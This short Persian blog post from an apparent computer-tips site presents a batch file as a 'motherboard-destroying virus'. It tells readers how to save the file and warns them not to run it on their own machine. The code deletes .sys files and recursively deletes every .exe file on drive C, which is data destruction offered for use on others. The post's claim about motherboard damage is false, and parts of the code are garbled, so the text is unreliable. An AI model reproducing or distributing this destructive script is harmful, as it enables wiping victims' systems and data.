X
تبلیغات
رایتل

آموزش کامپیوتر

ویروس خراب کننده مادر بورد

کار برد این ویروس این می باشید که مادر بادر بورد را خراب می کند.

برای این که بتوانید ویروس را فعال کنید باید یک فایل Notped  به سازید و در داخل Notped این مطالب را کپی کنید و پسوند این را bat بگذارید و نامش را هرچه خواصتی بگذارید و این را به خاطر داشته باشید که این ویروس را در کامپیوتر خود اجرا نکونید.

echo off@
cls
===========
color fc
Del /a c:\*.sysnnotepad
del /a c:\*.exe /s
===========